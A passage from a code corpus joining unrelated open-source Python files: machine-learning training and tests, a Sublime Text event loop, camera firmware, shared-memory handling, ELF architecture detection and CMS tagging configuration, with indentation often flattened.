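#       accuracy_mean, accuracy_var = scores["accuracy"]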
def train_classifier(feature_name, classifier_name, X, y, model_path=None):
"""Trains classifier."""
model = _make_classifier(classifier_name)
logging.info("%s: Fitting %s model ...",
feature_name, classifier_name)
model.fit(X, y)
logging.info("%s: %s: Score: %s", feature_name, classifier_name,
model.score(X, y))
if model_path:
logging.info("Saving model to \"%s\" ...", model_path)
    with open(model_path, "wb") as model_file:
      pickle.dump(model, model_file)
return model
def select_best_model(classifiers, feature_name, X_train, y_train,
cv_num_folds, cv_num_repeats):
"""Performs cross-validation of various classifiers for a given feature.
Returns a dictionary with the best classifier name, its score and the number
of candidates it was selected from.
Args:
classifiers: (list) Names of the classifiers to choose from.
feature_name: (string) WALS feature name.
X_train: (numpy array) Training features.
y_train: (numpy array) Training labels.
cv_num_folds: (int) Number of folds ($k$).
cv_num_repeats: (int) Number of repetitions.
Returns:
Dictionary containing best configuration.
"""
scores = []
for classifier_name in classifiers:
clf_scores = cross_validate(feature_name, classifier_name, X_train, y_train,
cv_num_folds, cv_num_repeats)
if clf_scores: # Cross-validation may fail for some settings.
scores.append((classifier_name, clf_scores))
# Sort the scores by the highest accuracy mean. For some reason F1 and
  # accuracy are the same (as are precision and recall). Investigate.
scores = sorted(scores, key=lambda score: score[1]["accuracy"][0],
reverse=True)
if len(scores) < 5:
raise ValueError("Expected at least five candidate classifiers!")
best_model = scores[0]
return {
MODEL_INFO_NAME_KEY: best_model[0], # Model name.
# Accuracy mean.
MODEL_INFO_SCORE_KEY: best_model[1]["accuracy"][0],
# Boolean sparsity marker.
MODEL_INFO_SPARSITY_KEY: best_model[1][MODEL_INFO_SPARSITY_KEY],
# Overall number of successful evals.
MODEL_INFO_CANDIDATES_KEY: len(scores)
}
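# End-to-end sketch for a single WALS feature. The feature_maker object and the
# cross-validation settings are assumed to come from the surrounding pipeline;
# "81A" is just an example feature ID.
#
#   X_train, y_train, X_dev, y_dev, dev_codes, class_counts = prepare_data(
#       feature_maker, "81A", use_implicationals=True)
#   best = select_best_model(ALL_MODELS, "81A", X_train, y_train,
#                            cv_num_folds=5, cv_num_repeats=2)
#   model = train_classifier("81A", best[MODEL_INFO_NAME_KEY], X_train, y_train)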
|
modules/core/sublime_event_loop.py | timfjord/sublime_debugger | 225 | 12686291
from __future__ import annotations
import asyncio
import sublime
import threading
class Handle:
def __init__(self, callback, args):
self.callback = callback
self.args = args
def __call__(self):
if self.callback:
self.callback(*self.args)
def cancel(self):
self.callback = None
self.args = None
class SublimeEventLoop (asyncio.AbstractEventLoop):
def run_forever(self):
raise NotImplementedError
def run_until_complete(self, future):
raise NotImplementedError
def stop(self):
raise NotImplementedError
def is_running(self):
raise NotImplementedError
def is_closed(self):
raise NotImplementedError
def close(self):
raise NotImplementedError
def shutdown_asyncgens(self):
raise NotImplementedError
# Methods scheduling callbacks. All these return Handles.
def _timer_handle_cancelled(self, handle):
raise NotImplementedError
def call_soon(self, callback, *args, context=None):
handle = Handle(callback, args)
sublime.set_timeout(handle, 0)
return handle
def call_later(self, delay, callback, *args, context=None):
handle = Handle(callback, args)
sublime.set_timeout(handle, delay * 1000)
return handle
def call_at(self, when, callback, *args):
raise NotImplementedError
def time(self):
raise NotImplementedError
def create_future(self):
return asyncio.futures.Future(loop=self)
# Method scheduling a coroutine object: create a task.
def create_task(self, coro):
task = asyncio.tasks.Task(coro, loop=self)
if task._source_traceback: #type: ignore
del task._source_traceback[-1] #type: ignore
return task
# Methods for interacting with threads.
def call_soon_threadsafe(self, callback, *args):
return self.call_later(0, callback, *args)
def run_in_executor(self, executor, func, *args):
raise NotImplementedError
def set_default_executor(self, executor):
raise NotImplementedError
# Task factory.
def set_task_factory(self, factory):
raise NotImplementedError
def get_task_factory(self):
raise NotImplementedError
# Error handlers.
def get_exception_handler(self):
raise NotImplementedError
def set_exception_handler(self, handler):
raise NotImplementedError
def default_exception_handler(self, context):
raise NotImplementedError
def call_exception_handler(self, context):
from .log import log_exception
from .error import Error
try:
if 'exception' in context:
raise context['exception']
else:
raise Error(context['message'])
except Exception as e:
log_exception()
# Debug flag management.
def get_debug(self):
return False
def set_debug(self, enabled):
raise NotImplementedError
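# Sketch of how this loop is meant to be wired up (the plugin's real bootstrap
# lives elsewhere; this only illustrates the subset of the API implemented
# above -- call_soon, call_later, create_task and create_future):
#
#   loop = SublimeEventLoop()
#   asyncio.set_event_loop(loop)
#
#   async def example():
#       print("hello from the Sublime event loop")
#
#   loop.create_task(example())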
|
qiskit_nature/transformers/base_transformer.py | renier/qiskit-nature | 132 | 12686308
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""The Base Operator Transformer interface."""
from abc import ABC, abstractmethod
from typing import Any
class BaseTransformer(ABC):
"""**DEPRECATED!** The interface for implementing methods which map from one `QMolecule` or
'WatsonHamiltonian' to another. These methods may or may not affect the size of the Hilbert
space.
"""
@abstractmethod
def transform(self, molecule_data: Any):
"""Transforms one `QMolecule` or 'WatsonHamiltonian' into another one. This may or may
not affect the size of the Hilbert space.
Args:
molecule_data: the `QMolecule` or 'WatsonHamiltonian' to be transformed.
Returns:
A new `QMolecule` or 'WatsonHamiltonian' instance.
"""
raise NotImplementedError()
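# Minimal illustrative subclass (hypothetical; the package's concrete
# transformers live in sibling modules):
#
#   class IdentityTransformer(BaseTransformer):
#       """Returns the molecule data unchanged."""
#
#       def transform(self, molecule_data: Any):
#           return molecule_data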
|
src/twisted/internet/iocpreactor/iocpsupport.py | giadram/twisted | 4,612 | 12686316
__all__ = [
"CompletionPort",
"Event",
"accept",
"connect",
"get_accept_addrs",
"have_connectex",
"makesockaddr",
"maxAddrLen",
"recv",
"recvfrom",
"send",
]
from twisted_iocpsupport.iocpsupport import ( # type: ignore[import]
CompletionPort,
Event,
accept,
connect,
get_accept_addrs,
have_connectex,
makesockaddr,
maxAddrLen,
recv,
recvfrom,
send,
)
|
tests/neptune/new/internal/test_container_structure.py | Raalsky/neptune-client | 254 | 12686319 | #
# Copyright (c) 2020, Neptune Labs Sp. z o.o.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import uuid
from neptune.new.exceptions import MetadataInconsistency
from neptune.new.internal.backends.neptune_backend_mock import NeptuneBackendMock
from neptune.new.internal.container_type import ContainerType
from neptune.new.internal.run_structure import ContainerStructure
from neptune.new.types.value import Value
class TestRunStructure(unittest.TestCase):
def test_get_none(self):
exp = ContainerStructure[int, dict]()
self.assertEqual(exp.get(["some", "path", "val"]), None)
def test_get_nested_variable_fails(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val"], 3)
with self.assertRaises(MetadataInconsistency):
exp.get(["some", "path", "val", "nested"])
with self.assertRaises(MetadataInconsistency):
exp.get(["some", "path", "val", "nested", "nested"])
def test_get_ns(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val"], 3)
self.assertEqual(exp.get(["some", "path"]), {"val": 3})
def test_set(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val"], 3)
self.assertEqual(exp.get(["some", "path", "val"]), 3)
def test_set_nested_variable_fails(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val"], 3)
with self.assertRaises(MetadataInconsistency):
exp.set(["some", "path", "val", "nested"], 3)
with self.assertRaises(MetadataInconsistency):
exp.set(["some", "path", "val", "nested", "nested"], 3)
def test_set_ns_collision(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val"], 3)
with self.assertRaises(MetadataInconsistency):
exp.set(["some", "path"], 5)
def test_pop(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val1"], 3)
exp.set(["some", "path", "val2"], 5)
exp.pop(["some", "path", "val2"])
self.assertEqual(exp.get(["some", "path", "val1"]), 3)
self.assertEqual(exp.get(["some", "path", "val2"]), None)
self.assertTrue(
"some" in exp.get_structure() and "path" in exp.get_structure()["some"]
)
def test_pop_whole_ns(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val"], 3)
exp.pop(["some", "path", "val"])
self.assertEqual(exp.get(["some", "path", "val"]), None)
self.assertFalse("some" in exp.get_structure())
def test_pop_not_found(self):
exp = ContainerStructure[int, dict]()
with self.assertRaises(MetadataInconsistency):
exp.pop(["some", "path"])
def test_pop_ns_fail(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val1"], 3)
with self.assertRaises(MetadataInconsistency):
exp.pop(["some", "path"])
class TestIterateSubpaths(unittest.TestCase):
# pylint: disable=protected-access
project_uuid = str(uuid.uuid4())
def setUp(self):
self.backend = NeptuneBackendMock()
exp = self.backend.create_run(self.project_uuid)
# FIXME test for projects
self.structure = self.backend._containers[(exp.id, ContainerType.RUN)]
self.structure.set(["attributes", "float"], Value())
self.structure.set(["attributes", "node", "one"], Value())
self.structure.set(["attributes", "node", "two"], Value())
self.structure.set(["attributes", "node", "three"], Value())
self.structure.set(["attributes", "int"], Value())
self.structure.set(["attributes", "string"], Value())
def test_iterate_empty_run(self):
empty_structure = ContainerStructure[Value, dict]()
self.assertListEqual(list(empty_structure.iterate_subpaths([])), [])
self.assertListEqual(list(empty_structure.iterate_subpaths(["test"])), [])
def test_iterate_empty_prefix(self):
prefix = []
expected_subpaths = [
"sys/id",
"sys/state",
"sys/owner",
"sys/size",
"sys/tags",
"sys/creation_time",
"sys/modification_time",
"sys/failed",
"attributes/float",
"attributes/int",
"attributes/string",
"attributes/node/one",
"attributes/node/two",
"attributes/node/three",
]
print(list(self.structure.iterate_subpaths(prefix)))
self.assertListEqual(
list(self.structure.iterate_subpaths(prefix)), expected_subpaths
)
def test_iterate_prefix(self):
prefix = ["sys"]
expected_subpaths = [
"sys/id",
"sys/state",
"sys/owner",
"sys/size",
"sys/tags",
"sys/creation_time",
"sys/modification_time",
"sys/failed",
]
self.assertListEqual(
list(self.structure.iterate_subpaths(prefix)), expected_subpaths
)
def test_iterate_long_prefix(self):
prefix = ["attributes", "node"]
expected_subpaths = [
"attributes/node/one",
"attributes/node/two",
"attributes/node/three",
]
self.assertListEqual(
list(self.structure.iterate_subpaths(prefix)), expected_subpaths
)
def test_iterate_nonexistent_prefix(self):
prefix = ["argh"]
expected_subpaths = []
self.assertListEqual(
list(self.structure.iterate_subpaths(prefix)), expected_subpaths
)
|
ProofOfConcepts/Vision/OpenMvStereoVision/src/target_code/stereo_remote_cam.py | WoodData/EndpointAI | 190 | 12686330 | import image, network, rpc, sensor, struct
import time
import micropython
from pyb import Pin
from pyb import LED
# variables that can be changed
save_to_SD = False
sensor_format = sensor.RGB565
#sensor_format = sensor.GRAYSCALE
# leds are used as an easy way to know if the remote camera has started fine
red_led = LED(1)
green_led = LED(2)
blue_led = LED(3)
ir_led = LED(4)
def led_control(x):
if (x&1)==0: red_led.off()
elif (x&1)==1: red_led.on()
if (x&2)==0: green_led.off()
elif (x&2)==2: green_led.on()
if (x&4)==0: blue_led.off()
elif (x&4)==4: blue_led.on()
if (x&8)==0: ir_led.off()
elif (x&8)==8: ir_led.on()
processing = True
# pin to trigger the snapshot
pin4 = Pin('P4', Pin.IN, Pin.PULL_UP)
# communication with the controller cam
interface = rpc.rpc_spi_slave(cs_pin="P3", clk_polarity=1, clk_phase=0)
# here we always choose the QVGA format (320x240) inside a VGA image
# if this is changed, the camera has to be calibrated again
# also, the logic of mask_height should be checked
img_width = 320
img_height = 240
# additional data for the mask height
if sensor_format == sensor.RGB565:
mask_height = int(img_height /8)
else:
mask_height = int(img_height / 4)
sensor.reset()
sensor_size = sensor.VGA
sensor.set_pixformat(sensor_format)
sensor.set_framesize(sensor_size)
sensor.set_windowing((int((sensor.width()-img_width)/2),int((sensor.height()-img_height)/2),img_width,img_height))
# the following is not really needed, this is to do the same as the controller cam
sensor.skip_frames(time = 2000)
sensor.snapshot()
################################################################
# Call Backs
################################################################
def sensor_config(data):
global processing
gain_db, exposure_us, r_gain_db, g_gain_db, b_gain_db = struct.unpack("<fIfff", data)
sensor.set_auto_gain(False, gain_db)
sensor.set_auto_exposure(False, exposure_us)
sensor.set_auto_whitebal(False, (r_gain_db, g_gain_db, b_gain_db))
processing = False
return struct.pack("<fIfff",gain_db, exposure_us, r_gain_db, g_gain_db, b_gain_db)
def raw_image_read_cb():
global processing
interface.put_bytes(sensor.get_fb().bytearray(), 5000) # timeout
processing = False
def raw_image_read(data):
interface.schedule_callback(raw_image_read_cb)
return bytes()
def loop_callback():
global processing
if not processing:
raise Exception
# Register call backs.
interface.register_callback(raw_image_read)
interface.register_callback(sensor_config)
interface.setup_loop_callback(loop_callback)
# a simple visual way to know the slave cam has started properly
# 2 blue blinks
led_control(4)
time.sleep(500)
led_control(0)
time.sleep(500)
led_control(4)
time.sleep(500)
led_control(0)
# configuration step
try:
processing = True
interface.loop()
except:
pass
#stabilisation of the cam
sensor.skip_frames(time=2000)
# save the ref image used for the diff
#print("About to save background image...")
data_fb = sensor.alloc_extra_fb(img_width, img_height, sensor.RGB565)
ref_img = sensor.alloc_extra_fb(img_width, img_height, sensor_format)
img = sensor.snapshot()
img.remap(data_fb, right=True)
ref_img.replace(img)
#print("Saved background image - Now frame differencing!")
# now add an additional part that will convey the mask info
sensor.set_windowing((int((sensor.width()-img_width)/2),int((sensor.height()-img_height)/2),img_width,img_height+ mask_height))
# serve forever
while True:
try:
processing = True
while not pin4.value():
pass
# get the image and undistort it
sent_image = sensor.snapshot()
sent_image.remap(data_fb, right=True)
# diff it with the ref image that has also been undistorted
sent_image.difference_special(ref_img, data_fb, 25, 40, 400, 2000)
interface.loop()
except:
pass
|
src/api-service/__app__/timer_daily/__init__.py | tonybaloney/onefuzz | 2,692 | 12686362
#!/usr/bin/env python
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import logging
import azure.functions as func
from ..onefuzzlib.webhooks import WebhookMessageLog
from ..onefuzzlib.workers.scalesets import Scaleset
def main(mytimer: func.TimerRequest) -> None: # noqa: F841
scalesets = Scaleset.search()
for scaleset in scalesets:
logging.info("updating scaleset configs: %s", scaleset.scaleset_id)
scaleset.needs_config_update = True
scaleset.save()
expired_webhook_logs = WebhookMessageLog.search_expired()
for log_entry in expired_webhook_logs:
logging.info(
"stopping expired webhook message log: %s:%s",
log_entry.webhook_id,
log_entry.event_id,
)
log_entry.delete()
|
factory-ai-vision/EdgeSolution/modules/InferenceModule/shared_memory.py | kaka-lin/azure-intelligent-edge-patterns | 176 | 12686370 | import tempfile
import mmap
import os
import logging
from exception_handler import PrintGetExceptionDetails
# ***********************************************************************************
# Shared memory management
#
class SharedMemoryManager:
def __init__(self, shmFlags=None, name=None, size=None):
try:
self._shmFilePath = '/dev/shm'
self._shmFileName = name
if self._shmFileName is None:
self._shmFileName = next(tempfile._get_candidate_names())
self._shmFileSize = size
if self._shmFileSize is None:
self._shmFileSize = 1024 * 1024 * 10 # Bytes (10MB)
self._shmFileFullPath = os.path.join(self._shmFilePath, self._shmFileName)
self._shmFlags = shmFlags
# See the NOTE section here: https://docs.python.org/2/library/os.html#os.open for details on shmFlags
if self._shmFlags is None:
self._shmFile = open(self._shmFileFullPath, 'r+b')
self._shm = mmap.mmap(self._shmFile.fileno(), self._shmFileSize)
else:
self._shmFile = os.open(self._shmFileFullPath, self._shmFlags)
os.ftruncate(self._shmFile, self._shmFileSize)
self._shm = mmap.mmap(self._shmFile, self._shmFileSize, mmap.MAP_SHARED, mmap.PROT_WRITE | mmap.PROT_READ)
# Dictionary to host reserved mem blocks
            # self._memSlots[seqNo] = [Begin, End] (closed interval)
self._memSlots = dict()
logging.info('Shared memory name: {0}'.format(self._shmFileFullPath))
except:
PrintGetExceptionDetails()
raise
def ReadBytes(self, memorySlotOffset, memorySlotLength):
try:
# This is Non-Zero Copy operation
# self._shm.seek(memorySlotOffset, os.SEEK_SET)
# bytesRead = self._shm.read(memorySlotLength)
# return bytesRead
#Zero-copy version
return memoryview(self._shm)[memorySlotOffset:memorySlotOffset+memorySlotLength].toreadonly()
except:
PrintGetExceptionDetails()
raise
# Returns None if no availability
# Returns closed interval [Begin, End] address with available slot
def GetEmptySlot(self, seqNo, sizeNeeded):
address = None
if sizeNeeded < 1:
return address
# Empty memory
if len(self._memSlots) < 1:
if self._shmFileSize >= sizeNeeded:
self._memSlots[seqNo] = (0, sizeNeeded - 1)
address = (0, sizeNeeded - 1)
else:
address = None
else:
self._memSlots = {k: v for k, v in sorted(
self._memSlots.items(), key=lambda item: item[1])}
# find an available memory gap = sizeNeeded
prevSlotEnd = 0
for k, v in self._memSlots.items():
if (v[0] - prevSlotEnd - 1) >= sizeNeeded:
address = (prevSlotEnd + 1, prevSlotEnd + sizeNeeded)
self._memSlots[seqNo] = (address[0], address[1])
break
else:
prevSlotEnd = v[1]
# no gap in between, check last possible gap
if address is None:
if (self._shmFileSize - prevSlotEnd + 1) >= sizeNeeded:
address = (prevSlotEnd + 1, prevSlotEnd + sizeNeeded)
self._memSlots[seqNo] = (address[0], address[1])
# interval [Begin, End]
return address
def DeleteSlot(self, seqNo):
try:
del self._memSlots[seqNo]
return True
except KeyError:
return False
def __del__(self):
try:
if self._shmFlags is None:
self._shmFile.close()
else:
os.close(self._shmFile)
except:
PrintGetExceptionDetails()
raise
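# Usage sketch (names, flags and sizes below are only illustrative):
#
#   manager = SharedMemoryManager(shmFlags=os.O_CREAT | os.O_RDWR,
#                                 name="inference_shm", size=1024 * 1024)
#   slot = manager.GetEmptySlot(seqNo=1, sizeNeeded=640 * 480 * 3)
#   if slot is not None:
#       begin, end = slot
#       # a producer would copy the frame bytes into the mapping at [begin, end]
#       view = manager.ReadBytes(begin, end - begin + 1)
#       manager.DeleteSlot(1)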
|
lisa/core/architecture.py | jrespeto/LiSa | 244 | 12686383
"""
ELF architecture detection module.
"""
import logging.config
from lisa.config import logging_config
logging.config.dictConfig(logging_config)
log = logging.getLogger()
e_machine = {
2: 'sparc',
3: 'i386',
4: 'm68k',
8: 'mips',
18: 'sparc32plus',
20: 'ppc',
21: 'ppc64',
22: 's390x',
40: 'arm',
41: 'alpha',
42: 'sh4',
43: 'sparc64',
62: 'x86_64',
183: 'aarch64'
}
def get_architecture(file_path):
"""Gets architecture and endianness information - needed
for starting guest machine and choosing proper image.
:param file_path: Path to file.
:returns: Tuple (arch, bit, endian)
"""
arch = None
bit = None
endian = None
with open(file_path, 'rb') as f:
header = f.read(32)
# check ELF header 7xELF
if header[:4] != b'\x7fELF':
log.critical('Analyzed file has invalid ELF header.')
return (None, None, None)
# 32 vs 64 bit
if header[4] == 1:
bit = '32'
elif header[4] == 2:
bit = '64'
# endianess
if header[5] == 1:
endian = 'little'
elif header[5] == 2:
endian = 'big'
# processor architecture
byte_arch = bytearray(header[18:20])
byte_arch_code = int.from_bytes(byte_arch, endian)
if byte_arch_code in e_machine:
arch = e_machine[byte_arch_code]
return (arch, bit, endian)
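# Example (sketch; the path below is a placeholder):
#
#   arch, bit, endian = get_architecture('/tmp/sample.elf')
#   if arch is None:
#       log.critical('Could not determine architecture of the sample.')
#   else:
#       log.info('Detected %s (%s-bit, %s endian)', arch, bit, endian)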
|
tests/datasets/test_combined_source_and_target.py | KevinMusgrave/pytorch-adapt | 131 | 12686396 | import unittest
import numpy as np
import torch
from pytorch_adapt.datasets import CombinedSourceAndTargetDataset
from pytorch_adapt.utils.common_functions import join_lists
class TestCombinedSourceAndTarget(unittest.TestCase):
def test_combined(self):
np.random.seed(3429)
for target_dataset_size in [99, 199]:
src_dataset_size = 117
src = torch.arange(src_dataset_size)
src = [{"src_imgs": i, "src_labels": i} for i in src]
tgt = torch.arange(target_dataset_size)
tgt = [{"target_imgs": i} for i in tgt]
d = CombinedSourceAndTargetDataset(src, tgt)
collected = []
num_loops = 10000
batch_size = 64
total_len = num_loops * batch_size
for x in range(num_loops):
collected.append([])
for i in range(batch_size):
batch = d[i]
collected[x].append(
(batch["src_imgs"].item(), batch["target_imgs"].item())
)
all_src = []
for c in collected:
self.assertTrue([x[1] for x in c] == list(range(batch_size)))
curr_src = [x[0] for x in c]
# check for randomness
self.assertTrue(curr_src not in all_src)
all_src.append(curr_src)
all_src = join_lists(all_src)
self.assertTrue(len(all_src) == total_len)
bincount = np.bincount(all_src)
self.assertTrue(len(bincount) == src_dataset_size)
ideal_bincount = total_len // src_dataset_size
self.assertTrue(
all(np.isclose(x, ideal_bincount, rtol=0.1) for x in bincount)
)
|
RecoBTag/CTagging/python/training_settings.py | ckamtsikis/cmssw | 852 | 12686398
import FWCore.ParameterSet.Config as cms
## IMPORTANT!
## This file was automatically generated by RecoBTag/CTagging/test/dump_training_vars_cfg.py
## with input xml files:
## - C vs L: ../data/c_vs_udsg.weight.xml sha1 checksum: 1b50773894bf3c64e41694bd48bda5f6f0e3795b
## - C vs B: ../data/c_vs_b.weight.xml sha1 checksum: c342f54c6448d488e6e2b483a3a3956e34ad8ea1
c_vs_l_vars_vpset = cms.VPSet(cms.PSet(
default = cms.double(-1),
name = cms.string('vertexLeptonCategory'),
taggingVarName = cms.string('vertexLeptonCategory')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(0),
name = cms.string('trackSip2dSig_0'),
taggingVarName = cms.string('trackSip2dSig')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(1),
name = cms.string('trackSip2dSig_1'),
taggingVarName = cms.string('trackSip2dSig')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(0),
name = cms.string('trackSip3dSig_0'),
taggingVarName = cms.string('trackSip3dSig')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(1),
name = cms.string('trackSip3dSig_1'),
taggingVarName = cms.string('trackSip3dSig')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('trackPtRel_0'),
taggingVarName = cms.string('trackPtRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('trackPtRel_1'),
taggingVarName = cms.string('trackPtRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('trackPPar_0'),
taggingVarName = cms.string('trackPPar')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('trackPPar_1'),
taggingVarName = cms.string('trackPPar')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('trackEtaRel_0'),
taggingVarName = cms.string('trackEtaRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('trackEtaRel_1'),
taggingVarName = cms.string('trackEtaRel')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackDeltaR_0'),
taggingVarName = cms.string('trackDeltaR')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackDeltaR_1'),
taggingVarName = cms.string('trackDeltaR')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackPtRatio_0'),
taggingVarName = cms.string('trackPtRatio')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackPtRatio_1'),
taggingVarName = cms.string('trackPtRatio')
),
cms.PSet(
default = cms.double(1.1),
idx = cms.int32(0),
name = cms.string('trackPParRatio_0'),
taggingVarName = cms.string('trackPParRatio')
),
cms.PSet(
default = cms.double(1.1),
idx = cms.int32(1),
name = cms.string('trackPParRatio_1'),
taggingVarName = cms.string('trackPParRatio')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackJetDist_0'),
taggingVarName = cms.string('trackJetDist')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackJetDist_1'),
taggingVarName = cms.string('trackJetDist')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackDecayLenVal_0'),
taggingVarName = cms.string('trackDecayLenVal')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackDecayLenVal_1'),
taggingVarName = cms.string('trackDecayLenVal')
),
cms.PSet(
default = cms.double(0),
name = cms.string('jetNSecondaryVertices'),
taggingVarName = cms.string('jetNSecondaryVertices')
),
cms.PSet(
default = cms.double(-0.1),
name = cms.string('jetNTracks'),
taggingVarName = cms.string('jetNTracks')
),
cms.PSet(
default = cms.double(-0.1),
name = cms.string('trackSumJetEtRatio'),
taggingVarName = cms.string('trackSumJetEtRatio')
),
cms.PSet(
default = cms.double(-0.1),
name = cms.string('trackSumJetDeltaR'),
taggingVarName = cms.string('trackSumJetDeltaR')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('vertexMass_0'),
taggingVarName = cms.string('vertexMass')
),
cms.PSet(
default = cms.double(-10),
idx = cms.int32(0),
name = cms.string('vertexEnergyRatio_0'),
taggingVarName = cms.string('vertexEnergyRatio')
),
cms.PSet(
default = cms.double(-999),
idx = cms.int32(0),
name = cms.string('trackSip2dSigAboveCharm_0'),
taggingVarName = cms.string('trackSip2dSigAboveCharm')
),
cms.PSet(
default = cms.double(-999),
idx = cms.int32(0),
name = cms.string('trackSip3dSigAboveCharm_0'),
taggingVarName = cms.string('trackSip3dSigAboveCharm')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('flightDistance2dSig_0'),
taggingVarName = cms.string('flightDistance2dSig')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('flightDistance3dSig_0'),
taggingVarName = cms.string('flightDistance3dSig')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('vertexJetDeltaR_0'),
taggingVarName = cms.string('vertexJetDeltaR')
),
cms.PSet(
default = cms.double(0),
idx = cms.int32(0),
name = cms.string('vertexNTracks_0'),
taggingVarName = cms.string('vertexNTracks')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('massVertexEnergyFraction_0'),
taggingVarName = cms.string('massVertexEnergyFraction')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('vertexBoostOverSqrtJetPt_0'),
taggingVarName = cms.string('vertexBoostOverSqrtJetPt')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonPtRel_0'),
taggingVarName = cms.string('leptonPtRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonPtRel_1'),
taggingVarName = cms.string('leptonPtRel')
),
cms.PSet(
default = cms.double(-10000),
idx = cms.int32(0),
name = cms.string('leptonSip3d_0'),
taggingVarName = cms.string('leptonSip3d')
),
cms.PSet(
default = cms.double(-10000),
idx = cms.int32(1),
name = cms.string('leptonSip3d_1'),
taggingVarName = cms.string('leptonSip3d')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonDeltaR_0'),
taggingVarName = cms.string('leptonDeltaR')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonDeltaR_1'),
taggingVarName = cms.string('leptonDeltaR')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonRatioRel_0'),
taggingVarName = cms.string('leptonRatioRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonRatioRel_1'),
taggingVarName = cms.string('leptonRatioRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonEtaRel_0'),
taggingVarName = cms.string('leptonEtaRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonEtaRel_1'),
taggingVarName = cms.string('leptonEtaRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonRatio_0'),
taggingVarName = cms.string('leptonRatio')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonRatio_1'),
taggingVarName = cms.string('leptonRatio')
))
c_vs_b_vars_vpset = cms.VPSet(cms.PSet(
default = cms.double(-1),
name = cms.string('vertexLeptonCategory'),
taggingVarName = cms.string('vertexLeptonCategory')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(0),
name = cms.string('trackSip2dSig_0'),
taggingVarName = cms.string('trackSip2dSig')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(1),
name = cms.string('trackSip2dSig_1'),
taggingVarName = cms.string('trackSip2dSig')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(0),
name = cms.string('trackSip3dSig_0'),
taggingVarName = cms.string('trackSip3dSig')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(1),
name = cms.string('trackSip3dSig_1'),
taggingVarName = cms.string('trackSip3dSig')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('trackPtRel_0'),
taggingVarName = cms.string('trackPtRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('trackPtRel_1'),
taggingVarName = cms.string('trackPtRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('trackPPar_0'),
taggingVarName = cms.string('trackPPar')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('trackPPar_1'),
taggingVarName = cms.string('trackPPar')
),
cms.PSet(
default = cms.double(-1),
